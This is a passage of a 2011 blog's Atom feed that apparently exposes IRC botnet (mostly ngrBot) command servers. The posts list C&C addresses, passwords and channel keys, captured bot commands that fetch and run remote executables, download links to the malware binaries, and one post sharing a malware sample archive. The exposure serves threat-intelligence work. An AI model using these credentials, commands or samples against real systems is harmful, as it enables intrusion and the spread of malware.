href='http://www.exposedbotnets.com/feeds/2625410595925757665/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/javaalb-teamcomlinux-bots-hosted-in.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2625410595925757665'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2625410595925757665'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/javaalb-teamcomlinux-bots-hosted-in.html' title='java.alb-team.com(linux bots hosted in United States  Ft. Lee  Righthosting.com)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-1954293624532876534</id><published>2011-11-26T00:44:00.000+01:00</published><updated>2011-11-26T00:44:05.177+01:00</updated><title type='text'>87.251.154.156(ngrBot hosted in Russian Federation  Moscow  Anders Telecom Ltd)</title><content type='html'>Remote Host Port Number&lt;br /&gt;199.15.234.7 80&lt;br /&gt;87.251.154.156 1890 PASS r00l&lt;br /&gt;&lt;br /&gt;NICK n{US|XPa}mqecvfh&lt;br /&gt;USER mqecvfh 0 0 :mqecvfh&lt;br /&gt;JOIN #bots r00l&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1954293624532876534?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/1954293624532876534/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/87251154156ngrbot-hosted-in-russian.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1954293624532876534'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1954293624532876534'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/87251154156ngrbot-hosted-in-russian.html' title='87.251.154.156(ngrBot hosted in Russian Federation  Moscow  Anders Telecom Ltd)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-6440741202054020644</id><published>2011-11-25T21:58:00.002+01:00</published><updated>2011-12-10T22:20:51.255+01:00</updated><title type='text'>latincrew.biz(ngrBot hosted in Russian Federation  Moscow  Oao Webalta)</title><content type='html'>Resolved : [latincrew.biz] To [92.241.165.124]&lt;br /&gt;Other domains used to control bots:&lt;br /&gt;&lt;br /&gt;xsstorm.com 87.255.51.229 &lt;br /&gt;latincrew.biz 92.241.165.124&lt;br /&gt;gu1d3sh3n.cz.cc 178.238.36.17&lt;br /&gt;&lt;br /&gt;92.241.165.124 1234 PASS xxx&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;NICK NEW-[USA|00|P|01507]&lt;br /&gt;USER XP-5713 * 0 :COMPUTERNAME&lt;br /&gt;MODE NEW-[USA|00|P|01507] -ix&lt;br /&gt;JOIN #!nw! test&lt;br /&gt;PONG 22 MOTD&lt;br /&gt;&lt;br /&gt;exe file:&lt;br /&gt;&lt;a href="http://b1e89f16.ultrafiles.net/" target="_blank"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.multiupload.com/MF2SUD71U5" target="_blank"&gt;Download &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;UPDATE:&lt;br /&gt;64.202.107.109 1234&lt;br /&gt;&lt;br /&gt;Now talking in #!nw!&lt;br /&gt;Topic On: [ #!nw! ] [ .g.f http://hotfile.com/dl/135879883/fa2041b/hl.exe c:\windows\temp\hl.exe 1 ]&lt;br /&gt;Topic By: [ p ]&lt;br /&gt;&lt;br /&gt;UPDATE:&lt;br /&gt;Remote Host Port Number&lt;br /&gt;199.15.234.7 80&lt;br /&gt;64.202.107.109 1234 PASS priv9&lt;br /&gt;&lt;br /&gt;NICK n{US|XP}uoahqtm&lt;br /&gt;USER uoahqtm 0 0 :uoahqtm&lt;br /&gt;JOIN #ngr HELO&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/92.241.165.124&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-6440741202054020644?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/6440741202054020644/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/latincrewbizngrbot-hosted-in-russian.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/6440741202054020644'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/6440741202054020644'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/latincrewbizngrbot-hosted-in-russian.html' title='latincrew.biz(ngrBot hosted in Russian Federation  Moscow  Oao Webalta)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-3867632003931046365</id><published>2011-11-25T21:14:00.001+01:00</published><updated>2011-12-04T20:56:33.821+01:00</updated><title type='text'>xD.a7aneek.net(80-100k ngrBotnet hosted in France  Paris  Gandi)</title><content type='html'>Same lamer with big net and still hosting with Gandi.net&lt;br /&gt;&lt;br /&gt;Resolved : [xD.a7aneek.net] To [92.243.17.156]&lt;br /&gt;Resolved : [xD.a7aneek.net] To [92.243.25.164]&lt;br /&gt;Resolved : [xD.a7aneek.net] To [92.243.0.109]&lt;br /&gt;Resolved : [xD.a7aneek.net] To [92.243.27.72]&lt;br /&gt;Resolved : [xD.a7aneek.net] To [92.243.10.12]&lt;br /&gt;&lt;br /&gt;Other domain names used to control bots:&lt;br /&gt;xD.0dayx.com&lt;br /&gt;appupdate.org&lt;br /&gt;xD.0days.me&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;92.243.10.12 5900 PASS ngrBot&lt;br /&gt;92.243.0.109 5900 PASS ngrBot&lt;br /&gt;92.243.27.72 5900 PASS ngrBot&lt;br /&gt;92.243.17.156 5900 PASS ngrBot&lt;br /&gt;92.243.25.164 5900 PASS ngrBot&lt;br /&gt;&lt;br /&gt;NICK n{US|XPa}vowobev&lt;br /&gt;USER vowobev 0 0 :vowobev&lt;br /&gt;JOIN ##Redrm-002## redem&lt;br /&gt;JOIN #new&lt;br /&gt;JOIN #SPp,#DLx,#UP&lt;br /&gt;&lt;br /&gt;Now talking in ##Redrm-002##&lt;br /&gt;Topic On: [ ##Redrm-002## ] [ !m on !j #SPp,#DLx,#UP !j -c UA,UKR #vnc ]&lt;br /&gt;Topic By: [ x3x ]&lt;br /&gt;[18:53] [x3x:##redrm-002## VERSION]&lt;br /&gt;&lt;br /&gt;the noob now version everyone who join his botnet and autoglines them if theyre not bots &lt;br /&gt;&lt;br /&gt;exe file used to spread:&lt;br /&gt;&lt;a href="http://b0336665.urlbeat.net/" target="_blank"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.multiupload.com/72J5Y4CNKH" target="_blank"&gt;Download &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;UPDATE:&lt;br /&gt;Resolved : [xD.0days.me] To [92.243.27.72]&lt;br /&gt;Resolved : [xD.0days.me] To [92.243.25.164]&lt;br /&gt;Resolved : [xD.0days.me] To [92.243.10.12]&lt;br /&gt;Resolved : [xD.0days.me] To [217.70.189.146]&lt;br /&gt;Resolved : [xD.0days.me] To [92.243.0.109]&lt;br /&gt;&lt;br /&gt;Now talking in ##Redrm-002##&lt;br /&gt;Topic On: [ ##Redrm-002## ] [ !m on !j #SPp,#DLx,#UP !j -c UA,UKR #vnc ]&lt;br /&gt;Topic By: [ _Magic ]&lt;br /&gt;&lt;br /&gt;Now talking in #sPp&lt;br /&gt;Topic On: [ #sPp ] [ !mod usbi on ]&lt;br /&gt;Topic By: [ _Magic ]&lt;br /&gt;&lt;br /&gt;Now talking in #vnc&lt;br /&gt;Topic On: [ #vnc  12] [ !mod pdef off !NAZEL http://hotfile.com/dl/134087331/ae699bf/yavncc.jpeg 291BFC99016ED4647862AEB896F741D1 -n ]&lt;br /&gt;Topic By: [ _Magic ]&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/92.243.25.164&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-3867632003931046365?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/3867632003931046365/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/xda7aneeknet80-100k-ngrbotnet-hosted-in.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/3867632003931046365'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/3867632003931046365'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/xda7aneeknet80-100k-ngrbotnet-hosted-in.html' title='xD.a7aneek.net(80-100k ngrBotnet hosted in France  Paris  Gandi)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-1155599729965289103</id><published>2011-11-24T21:19:00.000+01:00</published><updated>2011-11-24T21:19:13.349+01:00</updated><title type='text'>213.175.194.128(ngrBot hosted in United Kingdom  Durham  Eukhost Ltd)</title><content type='html'>Remote Host Port Number&lt;br /&gt;199.15.234.7 80&lt;br /&gt;213.175.194.128 8000 PASS ngrBot&lt;br /&gt;&lt;br /&gt;NICK n{US|XPa}lomkpuv&lt;br /&gt;USER lomkpuv 0 0 :lomkpuv&lt;br /&gt;JOIN ##putotimador## ngrBot&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/213.175.194.128&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1155599729965289103?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/1155599729965289103/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/213175194128ngrbot-hosted-in-united.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1155599729965289103'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1155599729965289103'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/213175194128ngrbot-hosted-in-united.html' title='213.175.194.128(ngrBot hosted in United Kingdom  Durham  Eukhost Ltd)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-7598719940005867178</id><published>2011-11-24T19:54:00.001+01:00</published><updated>2011-12-17T21:10:20.838+01:00</updated><title type='text'>shoe.mrkva.su(ngrBot hosted in Netherlands  Dediserv Dedicated Servers Sp. Z O.o)</title><content type='html'>same guy as update.jebac.net he keep changing domains lol&lt;br /&gt;&lt;br /&gt;shoe.mrkva.su 212.7.214.129&lt;br /&gt;&lt;br /&gt;Remote Host Port Number&lt;br /&gt;199.15.234.7 80&lt;br /&gt;212.7.214.129 2087 PASS carmex&lt;br /&gt;&lt;br /&gt;UPDATE:&lt;br /&gt;Resolved : [shoe.mrkva.su] To [212.7.214.3]&lt;br /&gt;&lt;br /&gt;Server: 212.7.214.3:2087 PASS carmex&lt;br /&gt; Server Password: &lt;br /&gt; Username: ztaisun&lt;br /&gt; Nickname: n{DE|XPa}ztaisun&lt;br /&gt; Channel: #!s! (Password: carmex) &lt;br /&gt; Channeltopic: :!mod usbi on&lt;br /&gt;&lt;br /&gt;&lt;a href="http://cce29c59.whackyvidz.com/" target="_blank"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.multiupload.com/WPFBCZI8GI" target="_blank"&gt;Download &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/212.7.214.129&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-7598719940005867178?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/7598719940005867178/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/shoemrkvasungrbot-hosted-in-netherlands.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/7598719940005867178'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/7598719940005867178'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/shoemrkvasungrbot-hosted-in-netherlands.html' title='shoe.mrkva.su(ngrBot hosted in Netherlands  Dediserv Dedicated Servers Sp. Z O.o)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-1966001955773835451</id><published>2011-11-23T23:43:00.000+01:00</published><updated>2011-11-23T23:43:03.930+01:00</updated><title type='text'>67.202.92.95(irc botnet hosted in United States Steadfast Networks)</title><content type='html'>Remote Host Port Number&lt;br /&gt;67.202.92.95 2345&lt;br /&gt;&lt;br /&gt;NICK New[USA|00|P|58651]&lt;br /&gt;PRIVMSG #!loco! :[M]: Thread Disabled.&lt;br /&gt;PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.&lt;br /&gt;USER XP-8084 * 0 :COMPUTERNAME&lt;br /&gt;MODE New[USA|00|P|58651] -ix&lt;br /&gt;JOIN #!loco!&lt;br /&gt;PONG 22 MOTD&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/67.202.92.95&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1966001955773835451?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/1966001955773835451/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/672029295irc-botnet-hosted-in-united.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1966001955773835451'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1966001955773835451'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/672029295irc-botnet-hosted-in-united.html' title='67.202.92.95(irc botnet hosted in United States Steadfast Networks)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-6327879675662780098</id><published>2011-11-22T22:50:00.000+01:00</published><updated>2011-11-22T22:50:24.834+01:00</updated><title type='text'>111mb malware samples</title><content type='html'>Full of bankers,irc bots,rats&lt;br /&gt;have fun &lt;br /&gt;&lt;br /&gt;&lt;a href="http://3393f9bc.theseforums.com/" target="_blank"&gt;Download&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-6327879675662780098?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/6327879675662780098/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/111mb-malware-samples.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/6327879675662780098'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/6327879675662780098'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/111mb-malware-samples.html' title='111mb malware samples'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-7587753450606435846</id><published>2011-11-22T20:46:00.000+01:00</published><updated>2011-11-22T20:46:18.071+01:00</updated><title type='text'>212.7.214.6(ngrBot hosted in Netherlands Dediserv Dedicated Servers Sp. Z O.o)</title><content type='html'>Remote Host Port Number&lt;br /&gt;212.7.214.6 2345&lt;br /&gt;&lt;br /&gt;NICK New[USA|00|P|78577]&lt;br /&gt;PRIVMSG #!loco! :[M]: Thread Disabled.&lt;br /&gt;PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.&lt;br /&gt;USER XP-6642 * 0 :COMPUTERNAME&lt;br /&gt;MODE New[USA|00|P|78577] -ix&lt;br /&gt;JOIN #!loco!&lt;br /&gt;PONG 22 MOTD&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/212.7.214.6&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-7587753450606435846?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/7587753450606435846/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/21272146ngrbot-hosted-in-netherlands.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/7587753450606435846'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/7587753450606435846'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/21272146ngrbot-hosted-in-netherlands.html' title='212.7.214.6(ngrBot hosted in Netherlands Dediserv Dedicated Servers Sp. Z O.o)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-7241559172386887879</id><published>2011-11-21T20:17:00.000+01:00</published><updated>2011-11-21T20:17:57.383+01:00</updated><title type='text'>mlsksfkajsfsa.com(ngrBot hosted in Netherlands  Amsterdam  Dediserv Dedicated Servers Sp. Z O.o)</title><content type='html'>Domains used to control bots:&lt;br /&gt;mlsksfkajsfsa.com 212.7.203.231&lt;br /&gt;scfafsbfs.com NONE&lt;br /&gt;scfafsbfs.com.local NONE&lt;br /&gt;djesibonajeb.com NONE&lt;br /&gt;djesibonajeb.com.local NONE&lt;br /&gt;&lt;br /&gt;Resolved : [mlsksfkajsfsa.com] To [212.7.203.231]&lt;br /&gt;&lt;br /&gt;Remote Host Port Number&lt;br /&gt;173.245.61.83 80&lt;br /&gt;199.15.234.7 80&lt;br /&gt;212.7.203.231 1866 PASS secret&lt;br /&gt;&lt;br /&gt;PRIVMSG #!x! :[DNS]: Blocked 1310 domain(s) - Redirected 0 domain(s)&lt;br /&gt;NICK n{US|XPa}hkiqwul&lt;br /&gt;USER hkiqwul 0 0 :hkiqwul&lt;br /&gt;JOIN #!x! secret&lt;br /&gt;PRIVMSG #!x! :[MSN]: Updated MSN spread interval to "3"&lt;br /&gt;PRIVMSG #!x! :[MSN]: Updated MSN spread message to ":) hahahahahaha! http://www.facebook.picnicfood.dk/Facebook-pic-68595-JPEG"&lt;br /&gt;PRIVMSG #!x! :[HTTP]: Updated HTTP spread interval to "3"&lt;br /&gt;PRIVMSG #!x! :[HTTP]: Updated HTTP spread message to ";) hehehe! http://www.facebook.picnicfood.dk/Facebook-pic-93181-JPEG"&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/212.7.203.231&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-7241559172386887879?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/7241559172386887879/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/mlsksfkajsfsacomngrbot-hosted-in.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/7241559172386887879'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/7241559172386887879'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/mlsksfkajsfsacomngrbot-hosted-in.html' title='mlsksfkajsfsa.com(ngrBot hosted in Netherlands  Amsterdam  Dediserv Dedicated Servers Sp. Z O.o)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-1048180560496762794</id><published>2011-11-20T22:15:00.000+01:00</published><updated>2011-11-20T22:15:57.695+01:00</updated><title type='text'>204.45.122.66(irc botnet hosted in United States  Chicago  Fdcservers.net)</title><content type='html'>Remote Host Port Number&lt;br /&gt;204.45.122.66 6061 PASS m3l0s1p0y0&lt;br /&gt;&lt;br /&gt;MODE {M3|USA|00|P|00029} -ixd&lt;br /&gt;JOIN ####bmw-m3# n4d4d4d4m3&lt;br /&gt;PRIVMSG ####bmw-m3# :&lt;br /&gt;Activado: enviando .&lt;br /&gt;PONG Tan.Sec.CSC.Com&lt;br /&gt;NICK {M3|USA|00|P|00029}&lt;br /&gt;USER XP-4625 * 0 :COMPUTERNAME&lt;br /&gt;&lt;br /&gt;Now talking in ####bmw-m3#&lt;br /&gt;Topic On: [ ####bmw-m3# ] [ -sprmsg Lo hermoso merece ser visto! para muestra un boton http://www.softwarearpbolivar.com/fotografias/paisajes/DSC-00572.JPG ]&lt;br /&gt;Topic By: [ Coupe ]&lt;br /&gt;Modes On: [ ####bmw-m3# ] [ +smntMu ]&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/204.45.122.66&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1048180560496762794?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/1048180560496762794/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/2044512266irc-botnet-hosted-in-united.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1048180560496762794'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1048180560496762794'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/2044512266irc-botnet-hosted-in-united.html' title='204.45.122.66(irc botnet hosted in United States  Chicago  Fdcservers.net)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-4847731528000314837</id><published>2011-11-20T21:15:00.001+01:00</published><updated>2011-11-20T21:41:01.978+01:00</updated><title type='text'>ngr.dns02.ns2.name(7k ngrBots hosted in United States  Franklin  Wisconsin Cyberlynk Network Inc)</title><content type='html'>DNS Requests:&lt;br /&gt;&lt;br /&gt;api.wipmania.com 199.15.234.7&lt;br /&gt;&lt;br /&gt;niidea.net 66.96.160.142&lt;br /&gt;&lt;br /&gt;ngr.hostname.ns1.name NONE&lt;br /&gt;&lt;br /&gt;ngr.hostname.ns1.name.local NONE&lt;br /&gt;&lt;br /&gt;ngrnd.scrapping.cc NONE&lt;br /&gt;&lt;br /&gt;ngrnd.scrapping.cc.local NONE&lt;br /&gt;&lt;br /&gt;ngrnd.zapto.org 199.102.236.233&lt;br /&gt;&lt;br /&gt;ngr.dns02.ns2.name 199.102.236.233&lt;br /&gt;&lt;br /&gt;Remote Host Port Number&lt;br /&gt;199.102.236.233 1590 PASS 44640151&lt;br /&gt;199.15.234.7 80&lt;br /&gt;&lt;br /&gt;Local users: Current Local Users: 7446 Max: 12732&lt;br /&gt;Global users: Current Global Users: 7446 Max: 7485&lt;br /&gt;&lt;br /&gt;NICK n{US|XPa}ufcvtzo&lt;br /&gt;USER ufcvtzo 0 0 :ufcvtzo&lt;br /&gt;PONG :C475B42B&lt;br /&gt;JOIN #rndbot zrag&lt;br /&gt;&lt;br /&gt;Now talking in #rndbot&lt;br /&gt;Modes On: [ #rndbot ] [ +smtMu ]&lt;br /&gt;(RnD) &amp;up http://swagropecuaria.com.ar/google.exe 762EF3564F80E8FE565A8B1431E2FCB0&lt;br /&gt;(RnD) &amp;up http://ctcontact.co/google.exe 762EF3564F80E8FE565A8B1431E2FCB0&lt;br /&gt;(RnD) &amp;up http://salkantaytrailperu.com/google.exe 762EF3564F80E8FE565A8B1431E2FCB0&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/199.102.236.233&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4847731528000314837?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/4847731528000314837/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/ngrdns02ns2name7k-ngrbots-hosted-in.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4847731528000314837'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4847731528000314837'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/ngrdns02ns2name7k-ngrbots-hosted-in.html' title='ngr.dns02.ns2.name(7k 